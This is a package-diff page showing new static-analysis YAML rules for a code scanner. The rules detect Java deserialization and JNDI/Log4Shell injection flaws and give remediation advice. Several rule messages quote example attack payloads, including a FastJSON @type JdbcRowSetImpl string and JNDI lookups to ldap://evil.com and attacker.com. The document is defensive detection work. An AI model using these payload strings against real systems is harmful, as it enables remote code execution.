npm - @zhuma4/cli - Versions diffs - 4.0.0-alpha.1 → 4.3.0 - Mend

@zhuma4/cli 4.0.0-alpha.1 → 4.3.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (1128) hide show

package/rules/unified/cwe-502/zm-java-cwe502-fastjson.yaml ADDED Viewed

@@ -0,0 +1,138 @@
+# Source: common | Cluster: N/A
+# CWE-502: FastJSON AutoType 不安全反序列化检测
+# 逐码 ZhuMa V4.1 — 通用规则库
+# 检测: JSON.parseObject() 且未设置 SafeMode 或 ParserConfig AutoType 配置不当
+rules:
+# ZM-JAVA-FJ-001: FastJSON parseObject 未开启 SafeMode
+- id: zm-java-fj-001
+  severity: ERROR
+  message: |
+    检测到 FastJSON JSON.parseObject() 调用，未显式启用 SafeMode。
+    FastJSON < 1.2.83 默认 AutoType 支持可导致任意类反序列化，攻击者可通过 @type 字段
+    指定任意类触发 RCE。已公开 gadget 包括: JdbcRowSetImpl、TemplatesImpl、BasicDataSource 等。
+    修复方案:
+    1. 升级 FastJSON 至 1.2.83+ 或 2.0.25+
+    2. 显式启用 SafeMode: ParserConfig.getGlobalInstance().setSafeMode(true)
+    3. 若必须使用 AutoType，配置严格白名单: ParserConfig.getGlobalInstance().addAccept("com.example.")
+    4. 迁移至 Jackson/Gson (默认不支持任意类型反序列化)
+    参考:
+    - CVE-2022-25845 (FastJSON AutoType RCE)
+    - https://github.com/alibaba/fastjson/wiki/enable_autotype
+  languages:
+    - java
+  patterns:
+    - pattern-inside: |
+        import com.alibaba.fastjson.JSON;
+        ...
+    - pattern-either:
+        - pattern: |
+            JSON.parseObject($INPUT)
+        - pattern: |
+            JSON.parseObject($INPUT, ...)
+        - pattern: |
+            JSON.parse($INPUT)
+        - pattern: |
+            JSON.parse($INPUT, ...)
+        - pattern: |
+            JSON.parseArray($INPUT)
+        - pattern: |
+            JSON.parseArray($INPUT, ...)
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: high
+    category: deserialization
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    references:
+      - "https://nvd.nist.gov/vuln/detail/CVE-2022-25845"
+      - "https://github.com/alibaba/fastjson/wiki/security_update"
+# ZM-JAVA-FJ-002: FastJSON AutoType 显式开启 (高危)
+- id: zm-java-fj-002
+  severity: ERROR
+  message: |
+    检测到 FastJSON 显式启用了 AutoTypeSupport。
+    开启 AutoType 后，攻击者可通过 @type 字段指定任意类触发反序列化 gadget 链。
+    应立即禁用 AutoType 并启用 SafeMode。
+    修复方案:
+    1. 移除 autoTypeSupport=true 配置
+    2. 启用 SafeMode: ParserConfig.getGlobalInstance().setSafeMode(true)
+    3. 仅在必须时使用 addAccept() 白名单
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        ParserConfig.getGlobalInstance().setAutoTypeSupport(true)
+    - pattern: |
+        $CONFIG.setAutoTypeSupport(true)
+    - pattern: |
+        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: very-high
+    category: deserialization
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+# ZM-JAVA-FJ-003: FastJSON @type 反序列化 + 未配置白名单
+- id: zm-java-fj-003
+  severity: ERROR
+  message: |
+    检测到 FastJSON 使用 JSON.parseObject() 解析可能含 @type 字段的 JSON 输入。
+    若输入来自用户且未启用 SafeMode，攻击者可在 JSON 中注入 {"@type":"com.sun.rowset.JdbcRowSetImpl",...}
+    实现 JNDI 注入 RCE。
+    修复方案:
+    1. 启用 SafeMode: ParserConfig.getGlobalInstance().setSafeMode(true)
+    2. 在 JSON 解析前过滤/移除 @type 字段
+    3. 升级至 FastJSON 2.0.25+ (默认安全模式)
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        JSON.parseObject($REQ.getParameter(...))
+    - pattern: |
+        JSON.parse($REQ.getParameter(...))
+    - pattern: |
+        JSON.parseObject($REQ.getParameter(...), $CLASS)
+    - pattern: |
+        JSON.parseArray($REQ.getParameter(...), $CLASS)
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: high
+    category: deserialization
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+# ZM-JAVA-FJ-004: FastJSON2 parseObject 未开启安全配置
+- id: zm-java-fj-004
+  severity: HIGH
+  message: |
+    检测到 FastJSON2 JSON.parseObject() 调用。FastJSON2 1.x 默认关闭 AutoType，
+    但若通过配置开启，仍存在反序列化风险。
+    修复方案:
+    1. 确保使用 FastJSON2 2.0.25+ 版本 (默认安全)
+    2. 不显式开启 AutoType
+    3. 使用 JSONReader.Feature.SupportAutoType 时配合白名单
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        com.alibaba.fastjson2.JSON.parseObject($INPUT)
+    - pattern: |
+        com.alibaba.fastjson2.JSON.parse($INPUT)
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: HIGH
+    precision: high
+    category: deserialization
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A08:2021 - Software and Data Integrity Failures"

package/rules/unified/cwe-502/zm-java-cwe502-gadget.yaml ADDED Viewed

@@ -0,0 +1,159 @@
+# Source: common | Cluster: N/A
+# CWE-502: Java 反序列化 Gadget 链检测
+# 逐码 ZhuMa V4.1 — 通用规则库
+# 检测: ObjectInputStream.readObject() 且 classpath 含已知危险 gadget 库
+rules:
+# ZM-JAVA-DS-GADGET-001: ObjectInputStream + Commons-Collections
+- id: zm-java-ds-gadget-001
+  severity: ERROR
+  message: |
+    检测到 ObjectInputStream.readObject() 与 Apache Commons Collections 同时使用。
+    Commons Collections 3.x/4.x 含已公开的反序列化 Gadget 链（如 InvokerTransformer、ChainedTransformer），
+    攻击者可通过构造恶意序列化对象实现远程代码执行（RCE）。
+    修复方案:
+    1. 升级至 Commons Collections 4.4.6+/3.2.3+ 版本（修复了不安全反序列化）
+    2. 使用 ValidatingObjectInputStream 限制可反序列化类型
+    3. 替换为 JSON/Protobuf 等安全序列化方案
+    参考:
+    - CVE-2015-6420 (Apache Commons Collections)
+    - ysoserial CommonsCollections1-7
+  languages:
+    - java
+  patterns:
+    - pattern-either:
+        - pattern: |
+            new ObjectInputStream(...).readObject();
+        - pattern: |
+            $OIS = new ObjectInputStream(...);
+            ...
+            $OIS.readObject();
+    - pattern-either:
+        - pattern: |
+            import org.apache.commons.collections4.*;
+            ...
+        - pattern: |
+            import org.apache.commons.collections.*;
+            ...
+        - pattern: |
+            import org.apache.commons.collections4.Transformer;
+            ...
+        - pattern: |
+            import org.apache.commons.collections.Transformer;
+            ...
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: medium
+    category: deserialization
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    references:
+      - "https://nvd.nist.gov/vuln/detail/CVE-2015-6420"
+      - "https://github.com/frohoff/ysoserial"
+# ZM-JAVA-DS-GADGET-002: ObjectInputStream + BeanShell
+- id: zm-java-ds-gadget-002
+  severity: ERROR
+  message: |
+    检测到 ObjectInputStream.readObject() 与 BeanShell 同时使用。
+    BeanShell 的 Interpreter 可通过 PriorityComparator gadget 触发任意代码执行。
+    攻击者可通过构造恶意序列化 BeanShell 对象实现 RCE。
+    修复方案:
+    1. 移除 BeanShell 依赖或替换为安全的表达式引擎
+    2. 使用 ValidatingObjectInputStream 限制反序列化类型
+    3. 使用 JSON/Protobuf 替代 Java 原生序列化
+    参考: ysoserial BeanShell1
+  languages:
+    - java
+  patterns:
+    - pattern-either:
+        - pattern: |
+            new ObjectInputStream(...).readObject();
+        - pattern: |
+            $OIS = new ObjectInputStream(...);
+            ...
+            $OIS.readObject();
+    - pattern: |
+        import bsh.*;
+        ...
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: medium
+    category: deserialization
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    references:
+      - "https://github.com/frohoff/ysoserial"
+# ZM-JAVA-DS-GADGET-003: ObjectInputStream + Spring Beans
+- id: zm-java-ds-gadget-003
+  severity: ERROR
+  message: |
+    检测到 ObjectInputStream.readObject() 与 Spring Beans 同时使用。
+    可利用 Spring BeanWrapperImpl / MethodInvokeTypeProvider 构造反序列化 gadget 链。
+    修复方案:
+    1. 使用 ValidatingObjectInputStream 限制反序列化类型白名单
+    2. 避免对不可信数据进行 Java 原生反序列化
+    3. 使用 Jackson/Gson + 类型白名单或 Protobuf
+  languages:
+    - java
+  patterns:
+    - pattern-either:
+        - pattern: |
+            new ObjectInputStream(...).readObject();
+        - pattern: |
+            $OIS = new ObjectInputStream(...);
+            ...
+            $OIS.readObject();
+    - pattern-either:
+        - pattern: |
+            import org.springframework.beans.*;
+            ...
+        - pattern: |
+            import org.springframework.beans.factory.*;
+            ...
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: medium
+    category: deserialization
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+# ZM-JAVA-DS-GADGET-004: ObjectInputStream + JNDI 可被利用
+- id: zm-java-ds-gadget-004
+  severity: ERROR
+  message: |
+    检测到 ObjectInputStream.readObject() 与 JNDI 查找同一文件中出现。
+    JNDI 注入常结合反序列化 gadget 实现 RCE（如 CVE-2021-44228 Log4Shell 变种）。
+    修复方案:
+    1. 禁用远程 JNDI 查找: -Dcom.sun.jndi.ldap.object.trustURLCodebase=false
+    2. JDK 升级至 8u191+/11.0.1+/17+ (默认禁用远程 codebase)
+    3. 避免对不可信数据进行反序列化，使用白名单机制
+  languages:
+    - java
+  patterns:
+    - pattern-inside: |
+        import javax.naming.*;
+        ...
+    - pattern-either:
+        - pattern: |
+            new ObjectInputStream(...).readObject();
+        - pattern: |
+            $OIS = new ObjectInputStream(...);
+            ...
+            $OIS.readObject();
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: low
+    category: deserialization
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A08:2021 - Software and Data Integrity Failures"

package/rules/unified/cwe-502/zm-java-cwe502-hessian-deep.yaml ADDED Viewed

@@ -0,0 +1,68 @@
+# Source: common | Cluster: N/A
+# CWE-502: Hessian 反序列化深度检测
+# 逐码 ZhuMa V4.3 — 反序列化深度覆盖
+rules:
+# ZM-JAVA-CWE502-HESSIAN-DEEP-001: Hessian2Input 反序列化用户输入
+- id: zm-java-cwe502-hessian-deep-001
+  severity: CRITICAL
+  message: |
+    Hessian2Input.readObject() 从 HTTP 请求流反序列化对象，
+    Hessian 协议已知多种 gadget chain（Spring AOP、Rome、Resin 等），
+    可通过构造恶意序列化数据执行任意代码。
+    修复: 1. 不在公网暴露 Hessian 端点 2. 使用 Hessian 前校验输入来源可信
+    3. 迁移到 gRPC/Spring Remoting with TLS + mTLS
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $HIN = new Hessian2Input($REQ.getInputStream());
+        ...
+        $HIN.readObject();
+    - pattern: |
+        $HIN = new HessianInput($REQ.getInputStream());
+        ...
+        $HIN.readObject();
+    - pattern: |
+        $SF = new HessianProxyFactory();
+        ...
+        $SF.create($API, $URL);
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: CRITICAL
+    precision: high
+    category: deserialization
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    likelihood: HIGH
+    impact: CRITICAL
+    tags: [deserialization, hessian, rce]
+    references:
+      - "https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html"
+# ZM-JAVA-CWE502-HESSIAN-DEEP-002: HessianSerializerFactory 无白名单
+- id: zm-java-cwe502-hessian-deep-002
+  severity: CRITICAL
+  message: |
+    HessianSerializerFactory 未设置类白名单（setAllow/ClassFactory），
+    允许反序列化任意 Hessian 类型。
+    修复: 使用 SerializerFactory.setAllow() 或自定义 ClassFactory 限制允许的类型，
+    参考阿里巴巴 Hessian 安全加固文档。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $SF = new SerializerFactory();
+        ...
+        $HIN.getSerializerFactory().$METHOD(...);
+    - pattern: |
+        $HIN.setSerializerFactory(new SerializerFactory());
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: CRITICAL
+    precision: medium
+    category: deserialization
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    likelihood: MEDIUM
+    impact: CRITICAL
+    tags: [deserialization, hessian, rce]

package/rules/unified/cwe-502/zm-java-cwe502-jackson-defaulttyping.yaml ADDED Viewed

@@ -0,0 +1,60 @@
+# Source: common | Cluster: N/A
+# CWE-502: Jackson ObjectMapper enableDefaultTyping 深度检测
+# 逐码 ZhuMa V4.3 — 反序列化深度覆盖
+rules:
+# ZM-JAVA-CWE502-JACKSON-001: ObjectMapper.enableDefaultTyping()
+- id: zm-java-cwe502-jackson-001
+  severity: CRITICAL
+  message: |
+    Jackson ObjectMapper 调用 enableDefaultTyping() 启用全局多态类型解析，
+    攻击者可通过 JSON 中的 @class 字段指定任意类进行反序列化，
+    结合 gadget chain 执行远程代码（RCE）。
+    修复: 移除 enableDefaultTyping() 调用，使用 @JsonTypeInfo 注解显式注册允许的多态子类型。
+  languages:
+    - java
+  pattern-either:
+    - pattern: $MAPPER.enableDefaultTyping()
+    - pattern: $MAPPER.enableDefaultTyping($X)
+    - pattern: new ObjectMapper().enableDefaultTyping()
+    - pattern: $MAPPER.activateDefaultTyping($PF)
+    - pattern: ObjectMapper().enableDefaultTyping()
+    - pattern: |
+        ObjectMapper $MAPPER = new ObjectMapper();
+        ...
+        $MAPPER.enableDefaultTyping(...);
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: CRITICAL
+    precision: very-high
+    category: deserialization
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    likelihood: HIGH
+    impact: CRITICAL
+    tags: [deserialization, jackson, rce]
+    references:
+      - "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
+# ZM-JAVA-CWE502-JACKSON-002: ObjectMapper readValue 无类型指定
+- id: zm-java-cwe502-jackson-002
+  severity: CRITICAL
+  message: |
+    ObjectMapper.readValue() 使用泛型/无类型参数反序列化不可信 JSON，
+    若 ObjectMapper 启用了 defaultTyping 或配置了额外的多态类型，可触发 RCE。
+    修复: 指定具体类型: mapper.readValue(json, MyClass.class)，
+    使用 TypeFactory.constructParametricType() 明确泛型类型。
+  languages:
+    - java
+  pattern-either:
+    - pattern: $MAPPER.readValue($INPUT, Object.class)
+    - pattern: $MAPPER.readValue($INPUT, new TypeReference<$T>() {})
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: CRITICAL
+    precision: medium
+    category: deserialization
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    likelihood: HIGH
+    impact: CRITICAL
+    tags: [deserialization, jackson, rce]

package/rules/unified/cwe-502/zm-java-cwe502-jndi-injection.yaml ADDED Viewed

@@ -0,0 +1,92 @@
+# Source: common | Cluster: N/A
+# CWE-502: JNDI Injection (Log4Shell-like vectors)
+# ZhuMa V4.1 — JNDI lookup from untrusted input
+rules:
+# ZM-JAVA-JNDI-001: InitialContext.lookup() with user-controlled name
+- id: zm-java-jndi-001
+  severity: ERROR
+  message: |
+    InitialContext.lookup() receives HTTP request parameter — JNDI injection.
+    Attacker supplies ldap://evil.com/Exploit for remote class loading (same vector as Log4Shell).
+    Fix: 1) Never pass user input to lookup() 2) Whitelist allowed JNDI names 3) Set com.sun.jndi.ldap.object.trustURLCodebase=false
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        new InitialContext().lookup($REQ.getParameter(...))
+    - pattern: |
+        new InitialContext().lookup($REQ.getHeader(...))
+    - pattern: |
+        new InitialContext().lookup($REQ.getAttribute(...))
+    - pattern: |
+        new InitialContext().lookup($REQ.getParameter(...));
+    - pattern: |
+        new InitialContext().lookup($REQ.getHeader(...));
+    - pattern: |
+        new InitialContext().lookup($REQ.getAttribute(...));
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: high
+    category: jndi-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+    references:
+      - "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
+      - "https://owasp.org/www-project-top-ten/2017/A8_2017-Insecure_Deserialization"
+# ZM-JAVA-JNDI-002: Context.lookup() with concatenated user input
+- id: zm-java-jndi-002
+  severity: ERROR
+  message: |
+    Context.lookup() name string concatenates user-supplied HTTP parameter — JNDI injection.
+    Even partial user control of JNDI name enables ldap:// RCE via remote codebase loading.
+    Fix: Do NOT concatenate user input into JNDI names; use hardcoded lookup strings only.
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $CTX.lookup($STR + $REQ.getParameter(...))
+    - pattern: |
+        $CTX.lookup($STR + $REQ.getHeader(...))
+    - pattern: |
+        $CTX.lookup($REQ.getParameter(...) + $STR)
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: medium
+    category: jndi-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+    references:
+      - "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
+# ZM-JAVA-JNDI-003: JndiTemplate/JndiLocatorDelegate lookup with user input (Spring)
+- id: zm-java-jndi-003
+  severity: ERROR
+  message: |
+    Spring JndiTemplate.lookup() receives user-supplied input — JNDI injection.
+    Use JndiObjectFactoryBean with hardcoded JNDI names; never pass dynamic user data.
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        new JndiTemplate().lookup($REQ.getParameter(...))
+    - pattern: |
+        $JT.lookup($REQ.getParameter(...))
+    - pattern: |
+        new JndiTemplate().lookup($REQ.getParameter(...));
+    - pattern: |
+        new JndiLocatorDelegate().lookup($REQ.getParameter(...))
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: ERROR
+    precision: high
+    category: jndi-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"

package/rules/unified/cwe-502/zm-java-cwe502-kryo-deep.yaml ADDED Viewed

@@ -0,0 +1,65 @@
+# Source: common | Cluster: N/A
+# CWE-502: Kryo 无注册限制反序列化检测
+# 逐码 ZhuMa V4.3 — 反序列化深度覆盖
+rules:
+# ZM-JAVA-CWE502-KRYO-DEEP-001: Kryo 无 registrationRequired
+- id: zm-java-cwe502-kryo-deep-001
+  severity: CRITICAL
+  message: |
+    Kryo.setRegistrationRequired(false) 或未调用 setRegistrationRequired(true)，
+    允许反序列化任意未注册的类，攻击者可通过 gadget chain 实现代码执行。
+    修复: kryo.setRegistrationRequired(true) 并显式注册所有可序列化的类，
+    使用 kryo.register(MyClass.class) 逐类注册。
+  languages:
+    - java
+  pattern-either:
+    - pattern: $KRYO.setRegistrationRequired(false)
+    - pattern: |
+        $KRYO = new Kryo();
+        ...
+        $KRYO.readObject($INPUT, $CLS);
+    - pattern: |
+        $KRYO = new Kryo();
+        ...
+        $KRYO.readClassAndObject($INPUT);
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: CRITICAL
+    precision: high
+    category: deserialization
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    likelihood: HIGH
+    impact: CRITICAL
+    tags: [deserialization, kryo, rce]
+    references:
+      - "https://github.com/EsotericSoftware/kryo#security"
+# ZM-JAVA-CWE502-KRYO-DEEP-002: Kryo readObject 从 HTTP 请求
+- id: zm-java-cwe502-kryo-deep-002
+  severity: CRITICAL
+  message: |
+    Kryo 从 HTTP 请求输入流反序列化对象，远程攻击者可提交恶意序列化数据。
+    修复: 1. 设置 registrationRequired(true) 2. 不要在公网暴露 Kryo 端点
+    3. 使用 Kryo 5.x 的 FieldSerializer 安全配置。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $IN = new Input($REQ.getInputStream());
+        ...
+        $KRYO.readObject($IN, $CLS);
+    - pattern: |
+        $IN = new Input($REQ.getInputStream());
+        ...
+        $KRYO.readClassAndObject($IN);
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: CRITICAL
+    precision: very-high
+    category: deserialization
+    owasp: "A08:2021 - Software and Data Integrity Failures"
+    likelihood: HIGH
+    impact: CRITICAL
+    tags: [deserialization, kryo, rce]

package/rules/unified/cwe-502/zm-java-cwe502-log4j-jndi.yaml ADDED Viewed

@@ -0,0 +1,67 @@
+# Source: common | Cluster: N/A
+# CWE-502: Log4j JNDI 注入 (CVE-2021-44228 Log4Shell)
+# 逐码 ZhuMa V4.3 — Log4j 漏洞专项检测
+rules:
+# ZM-JAVA-CWE502-LOG4J-001: Log4j2 log 方法含用户输入 (Log4Shell sink)
+- id: zm-java-cwe502-log4j-001
+  severity: CRITICAL
+  message: |
+    Log4j2 日志记录中包含用户可控字符串，可能触发 JNDI 注入（Log4Shell, CVE-2021-44228）。
+    攻击者可通过注入 ${jndi:ldap://attacker.com/a} 进行 JNDI lookup 获取远程代码执行。
+    修复: 1. 升级 Log4j2 到 >= 2.17.1 (Java 8) 或 >= 2.12.4 (Java 7)
+    2. 设置 log4j2.formatMsgNoLookups=true 3. 移除 JndiLookup 类:
+    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
+  languages:
+    - java
+  pattern-either:
+    - pattern: $LOG.info($REQ.getParameter(...))
+    - pattern: $LOG.error($REQ.getParameter(...))
+    - pattern: $LOG.debug($REQ.getParameter(...))
+    - pattern: $LOG.warn($REQ.getParameter(...))
+    - pattern: $LOG.trace($REQ.getParameter(...))
+    - pattern: $LOG.fatal($REQ.getParameter(...))
+    - pattern: |
+        $LOG.info($MSG + $REQ.getParameter(...))
+    - pattern: |
+        $LOG.error("..." + $REQ.getParameter(...))
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: CRITICAL
+    precision: very-high
+    category: rce
+    owasp: "A03:2021 - Injection"
+    likelihood: HIGH
+    impact: CRITICAL
+    tags: [log4j, log4shell, jndi, rce, cve-2021-44228]
+    references:
+      - "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
+      - "https://logging.apache.org/log4j/2.x/security.html"
+# ZM-JAVA-CWE502-LOG4J-002: Logger message 拼接用户输入
+- id: zm-java-cwe502-log4j-002
+  severity: CRITICAL
+  message: |
+    Log4j/Logback 日志消息使用字符串拼接包含用户输入（如 "${jndi:"）。
+    攻击者可以通过 HTTP Header/Parameter 注入 JNDI lookup 语法触发 RCE。
+    修复: 1. 升级日志框架版本 2. 使用参数化日志: logger.info("User: {}", username)
+    3. 对用户输入做 ${ 过滤
+  languages:
+    - java
+  pattern-either:
+    - pattern: $LOG.info("..." + $REQ.getHeader(...))
+    - pattern: $LOG.error("..." + $REQ.getHeader(...))
+    - pattern: $LOG.warn("..." + $REQ.getHeader(...))
+    - pattern: $LOG.debug("..." + $REQ.getHeader(...))
+  metadata:
+    cwe: "CWE-502: Deserialization of Untrusted Data"
+    severity: CRITICAL
+    precision: very-high
+    category: rce
+    owasp: "A03:2021 - Injection"
+    likelihood: HIGH
+    impact: CRITICAL
+    tags: [log4j, log4shell, jndi, rce]
+    references:
+      - "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"